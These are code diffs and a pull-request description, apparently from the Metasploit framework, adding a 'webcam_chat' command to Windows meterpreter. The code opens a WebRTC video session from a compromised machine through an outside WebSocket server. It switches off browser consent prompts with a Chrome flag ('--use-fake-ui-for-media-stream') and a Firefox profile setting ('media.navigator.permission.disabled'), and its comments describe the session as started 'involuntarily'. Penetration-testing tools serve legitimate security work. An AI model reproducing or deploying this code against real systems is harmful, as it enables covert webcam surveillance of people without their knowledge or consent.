       write_file("#{tmp_dir}\\interface.html", interface)
       write_file("#{tmp_dir}\\api.js", api)
     rescue ::Exception => e
-      elog("chat_request failed. #{e.class} #{e.to_s}")
+      elog("webcam_chat failed. #{e.class} #{e.to_s}")
       raise RuntimeError, "Unable to initialize the interface on the target machine"
     end
 
@@ -173,7 +173,7 @@ class Webcam
       begin
         write_file(profile_path, setting)
       rescue ::Exception => e
-        elog("chat_request failed: #{e.class} #{e.to_s}")
+        elog("webcam_chat failed: #{e.class} #{e.to_s}")
         raise RuntimeError, "Unable to write the necessary setting for Firefox."
       end
       args = "-p #{profile_name}"
@@ -184,7 +184,7 @@ class Webcam
     begin
       session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
     rescue ::Exception => e
-      elog("chat_request failed. #{e.class} #{e.to_s}")
+      elog("webcam_chat failed. #{e.class} #{e.to_s}")
       raise RuntimeError, "Unable to start the remote browser: #{e.message}"
     end
   end

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -160,7 +160,7 @@ class Webcam
 
     args = ''
     if remote_browser_path =~ /Chrome/
-      args = "--allow-file-access-from-files"
+      args = "--allow-file-access-from-files --use-fake-ui-for-media-stream"
     end
 
     exec_opts = {'Hidden' => false, 'Channelized' => false}

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -206,7 +206,6 @@ class Webcam
 
     interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
     interface = interface.gsub(/\=RHOST\=/, rhost)
-    interface = interface.gsub(/\=STARTTIME\=/, Time.now.to_s)
     interface = interface.gsub(/\=CHANNEL\=/, channel)
     interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
 

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -56,6 +56,12 @@ class Webcam
     true
   end
 
+  #
+  # Starts a webcam session with a remote user via WebRTC
+  #
+  # @param server [String] A server to use for the channel.
+  # @return void
+  #
   def webcam_chat(server)
     offerer_id = Rex::Text.rand_text_alphanumeric(10)
     channel    = Rex::Text.rand_text_alphanumeric(20)
@@ -136,7 +142,7 @@ class Webcam
 
   #
   # Creates a video chat session as an offerer... involuntarily :-p
-  # Winodws targets only.
+  # Windows targets only.
   #
   # @param remote_browser_path [String] A browser path that supports WebRTC on the target machine
   # @param offerer_id [String] A ID that the answerer can look for and join

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -97,8 +97,7 @@ class Webcam
     when /win/
       paths = [
         "Program Files\\Google\\Chrome\\Application\\chrome.exe",
-        "Program Files\\Mozilla Firefox\\firefox.exe",
-        "Program Files\\Opera\\launcher.exe"
+        "Program Files\\Mozilla Firefox\\firefox.exe"
       ]
 
       drive = session.sys.config.getenv("SYSTEMDRIVE")

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -56,7 +56,7 @@ class Webcam
     true
   end
 
-  def webcam_chat
+  def webcam_chat(server)
     offerer_id = Rex::Text.rand_text_alphanumeric(10)
     channel    = Rex::Text.rand_text_alphanumeric(20)
 
@@ -66,8 +66,8 @@ class Webcam
       raise RuntimeError, "Unable to find a suitable browser on the target machine"
     end
 
-    ready_status = init_video_chat(remote_browser_path, channel, offerer_id)
-    connect_video_chat(channel, offerer_id)
+    ready_status = init_video_chat(remote_browser_path, server, channel, offerer_id)
+    connect_video_chat(server, channel, offerer_id)
   end
 
   # Record from default audio source for +duration+ seconds;
@@ -141,10 +141,11 @@ class Webcam
   # @param remote_browser_path [String] A browser path that supports WebRTC on the target machine
   # @param offerer_id [String] A ID that the answerer can look for and join
   #
-  def init_video_chat(remote_browser_path, channel, offerer_id)
+  def init_video_chat(remote_browser_path, server, channel, offerer_id)
     interface = load_interface('offerer.html')
     api       = load_api_code
 
+    interface = interface.gsub(/\=SERVER\=/, server)
     interface = interface.gsub(/\=CHANNEL\=/, channel)
     interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
 
@@ -195,7 +196,7 @@ class Webcam
   # @param offerer_id [String] The offerer's ID in order to join the video chat
   # @return void
   #
-  def connect_video_chat(channel, offerer_id)
+  def connect_video_chat(server, channel, offerer_id)
     interface = load_interface('answerer.html')
     api       = load_api_code
 
@@ -204,6 +205,7 @@ class Webcam
     tmp_api.write(api)
     tmp_api.close
 
+    interface = interface.gsub(/\=SERVER\=/, server)
     interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path)
     interface = interface.gsub(/\=RHOST\=/, rhost)
     interface = interface.gsub(/\=CHANNEL\=/, channel)

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -137,6 +137,7 @@ class Webcam
 
   #
   # Creates a video chat session as an offerer... involuntarily :-p
+  # Winodws targets only.
   #
   # @param remote_browser_path [String] A browser path that supports WebRTC on the target machine
   # @param offerer_id [String] A ID that the answerer can look for and join
@@ -158,9 +159,19 @@ class Webcam
       raise RuntimeError, "Unable to initialize the interface on the target machine"
     end
 
+    #
+    # Automatically allow the webcam to run on the target machine
+    #
     args = ''
     if remote_browser_path =~ /Chrome/
       args = "--allow-file-access-from-files --use-fake-ui-for-media-stream"
+    elsif remote_browser_path =~ /Firefox/
+      profile_name = Rex::Text.rand_text_alpha(8)
+      o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
+      profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
+      setting = %Q|user_pref("media.navigator.permission.disabled", true);|
+      write_file(profile_path, setting)
+      args = "-p #{profile_name}"
     end
 
     exec_opts = {'Hidden' => false, 'Channelized' => false}

--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -170,7 +170,12 @@ class Webcam
       o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
       profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
       setting = %Q|user_pref("media.navigator.permission.disabled", true);|
-      write_file(profile_path, setting)
+      begin
+        write_file(profile_path, setting)
+      rescue ::Exception => e
+        elog("chat_request failed: #{e.class} #{e.to_s}")
+        raise RuntimeError, "Unable to write the necessary setting for Firefox."
+      end
       args = "-p #{profile_name}"
     end
 

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -132,13 +132,7 @@ class Console::CommandDispatcher::Stdapi::Webcam
   end
 
   def cmd_chat_request(*args)
-    wc_list = []
-    begin
-      wc_list << client.webcam.webcam_list
-    rescue
-    end
-
-    if wc_list.length == 0
+    if client.webcam.webcam_list.length == 0
       print_error("Target does not have a webam")
       return
     end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -144,7 +144,7 @@ class Console::CommandDispatcher::Stdapi::Webcam
     end
 
     begin
-      print_status("Initializing a browser with WebRTC support...")
+      print_status("Initializing a video chat request...")
       client.webcam.webcam_chat
     rescue RuntimeError => e 
       print_error(e.message)

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -132,6 +132,17 @@ class Console::CommandDispatcher::Stdapi::Webcam
   end
 
   def cmd_webcam_chat(*args)
+    wc_list = []
+    begin
+      wc_list << client.webcam.webcam_list
+    rescue
+    end
+
+    if wc_list.length == 0
+      print_error("Target does not have a webam")
+      return
+    end
+
     begin
       print_status("Initializing a browser with WebRTC support...")
       client.webcam.webcam_chat

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -25,12 +25,14 @@ class Console::CommandDispatcher::Stdapi::Webcam
       "webcam_list"   => "List webcams",
       "webcam_snap"   => "Take a snapshot from the specified webcam",
       "webcam_stream" => "Play a video stream from the specified webcam",
+      "webcam_chat"   => "Start a video chat",
       "record_mic"    => "Record audio from the default microphone for X seconds"
     }
     reqs = {
       "webcam_list"   => [ "webcam_list" ],
       "webcam_snap"   => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
       "webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
+      "webcam_chat"   => [ "webcam_list" ],
       "record_mic"    => [ "webcam_audio_record" ],
     }
 
@@ -129,6 +131,9 @@ class Console::CommandDispatcher::Stdapi::Webcam
     end
   end
 
+  def cmd_webcam_chat(*args)
+    client.webcam.webcam_chat
+  end
 
   def cmd_webcam_stream(*args)
     print_status("Starting...")

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -22,17 +22,17 @@ class Console::CommandDispatcher::Stdapi::Webcam
   #
   def commands
     all = {
+      "chat_request"  => "Start a video chat request",
       "webcam_list"   => "List webcams",
       "webcam_snap"   => "Take a snapshot from the specified webcam",
       "webcam_stream" => "Play a video stream from the specified webcam",
-      "webcam_chat"   => "Start a video chat",
       "record_mic"    => "Record audio from the default microphone for X seconds"
     }
     reqs = {
+      "chat_request"  => [ "webcam_list" ],
       "webcam_list"   => [ "webcam_list" ],
       "webcam_snap"   => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
       "webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
-      "webcam_chat"   => [ "webcam_list" ],
       "record_mic"    => [ "webcam_audio_record" ],
     }
 
@@ -131,7 +131,7 @@ class Console::CommandDispatcher::Stdapi::Webcam
     end
   end
 
-  def cmd_webcam_chat(*args)
+  def cmd_chat_request(*args)
     wc_list = []
     begin
       wc_list << client.webcam.webcam_list
@@ -144,8 +144,8 @@ class Console::CommandDispatcher::Stdapi::Webcam
     end
 
     begin
-      print_status("Initializing a video chat request...")
-      client.webcam.webcam_chat
+      print_status("Video chat request sent.")
+      client.webcam.chat_request
     rescue RuntimeError => e 
       print_error(e.message)
     end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -133,8 +133,9 @@ class Console::CommandDispatcher::Stdapi::Webcam
 
   def cmd_webcam_chat(*args)
     begin
+      print_status("Initializing a browser with WebRTC support...")
       client.webcam.webcam_chat
-    rescue RuntimeError => e
+    rescue RuntimeError => e 
       print_error(e.message)
     end
   end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -132,7 +132,11 @@ class Console::CommandDispatcher::Stdapi::Webcam
   end
 
   def cmd_webcam_chat(*args)
-    client.webcam.webcam_chat
+    begin
+      client.webcam.webcam_chat
+    rescue RuntimeError => e
+      print_error(e.message)
+    end
   end
 
   def cmd_webcam_stream(*args)

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -137,9 +137,29 @@ class Console::CommandDispatcher::Stdapi::Webcam
       return
     end
 
+    server = 'wsnodejs.jit.su:80'
+
+    webcam_chat_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help banner"],
+      "-s" => [ false, "WebSocket server" ]
+    )
+
+    webcam_chat_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: webcam_chat [options]\n" )
+          print_line( "Starts a video conversation with your target." )
+          print_line( webcam_chat_opts.usage )
+          return
+        when "-s"
+          server = val.to_i
+      end
+    }
+
+
     begin
       print_status("Video chat session initialized.")
-      client.webcam.webcam_chat
+      client.webcam.webcam_chat(server)
     rescue RuntimeError => e 
       print_error(e.message)
     end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -133,7 +133,7 @@ class Console::CommandDispatcher::Stdapi::Webcam
 
   def cmd_webcam_chat(*args)
     if client.webcam.webcam_list.length == 0
-      print_error("Target does not have a webam")
+      print_error("Target does not have a webcam")
       return
     end
 
@@ -158,7 +158,7 @@ class Console::CommandDispatcher::Stdapi::Webcam
 
 
     begin
-      print_status("Video chat session initialized.")
+      print_status("Webcam chat session initialized.")
       client.webcam.webcam_chat(server)
     rescue RuntimeError => e 
       print_error(e.message)

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -149,6 +149,9 @@ class Console::CommandDispatcher::Stdapi::Webcam
         when "-h"
           print_line( "Usage: webcam_chat [options]\n" )
           print_line( "Starts a video conversation with your target." )
+          print_line( "Browser Requirements:")
+          print_line( "Chrome: version 23 or newer" )
+          print_line( "Firefox: version 22 or newer" )
           print_line( webcam_chat_opts.usage )
           return
         when "-s"

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -22,14 +22,14 @@ class Console::CommandDispatcher::Stdapi::Webcam
   #
   def commands
     all = {
-      "chat_request"  => "Start a video chat request",
+      "webcam_chat"   => "Start a video chat",
       "webcam_list"   => "List webcams",
       "webcam_snap"   => "Take a snapshot from the specified webcam",
       "webcam_stream" => "Play a video stream from the specified webcam",
       "record_mic"    => "Record audio from the default microphone for X seconds"
     }
     reqs = {
-      "chat_request"  => [ "webcam_list" ],
+      "webcam_chat"   => [ "webcam_list" ],
       "webcam_list"   => [ "webcam_list" ],
       "webcam_snap"   => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
       "webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
@@ -131,15 +131,15 @@ class Console::CommandDispatcher::Stdapi::Webcam
     end
   end
 
-  def cmd_chat_request(*args)
+  def cmd_webcam_chat(*args)
     if client.webcam.webcam_list.length == 0
       print_error("Target does not have a webam")
       return
     end
 
     begin
-      print_status("Video chat request sent.")
-      client.webcam.chat_request
+      print_status("Video chat session initialized.")
+      client.webcam.webcam_chat
     rescue RuntimeError => e 
       print_error(e.message)
     end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -155,7 +155,7 @@ class Console::CommandDispatcher::Stdapi::Webcam
           print_line( webcam_chat_opts.usage )
           return
         when "-s"
-          server = val.to_i
+          server = val.to_s
       end
     }
 


### PR DESCRIPTION
This PR adds a video chat feature to the Windows meterpreter via Web Real-Time Communication (WebRTC). It is related to the following ticket ("Allow the attacker to interact with the target (human) via a webcam"):
http://dev.metasploit.com/redmine/issues/8763
### Test Requirements:

In order to test this PR, you must prepare the following items:
- [x] A webcam for the attacker.
- [x] A webcam for the victim (VM)
- [x] A Windows VM (victim)
- [x] On the attacker side: One of these browsers that supports WebRTC: Chrome (v23 or newer), or Firefox (v22 or newer).
- [x] On the victim's side: One of these browsers that support WebRTC: Chrome (v23 or newer), or Firefox (v22 or newer)
### Verification steps:
- [x] Have the Windows VM up and running. And make sure a webcam is connected to it.
- [x] Make sure you, as the attacker, are connected to a different webcam.
- [x] Get a Windows meterpreter session going.
- [x] Under the meterpreter prompt, issue command `webcam_chat`
- [x] Confirm that you see a video session going.
### Before you ask any questions, see the following:
- Recording is currently not possible due to API limitations with Chrome.
- In the attacker's interface, after you allowing the webcam to run, it will try to ask you again even though the video chat is already running just fine. Ignore that. After the first prompt, you should just press 'X' to ignore the rest. Or you don't really have to do anything.
- Internet Explorer does not support WebRTC natively.
- If you work with me and need another webcam to test, please come find me.
- Yes, you can full-screen the video if it isn't big enough for you. Volume control too.
- No, I'm not an UI expert, don't judge me.
### Demo from the attacker's view:

![vid_session_example](https://f.cloud.github.com/assets/1170914/2145733/8b9fa5b8-93ad-11e3-963b-e7e2255cbf8c.png)
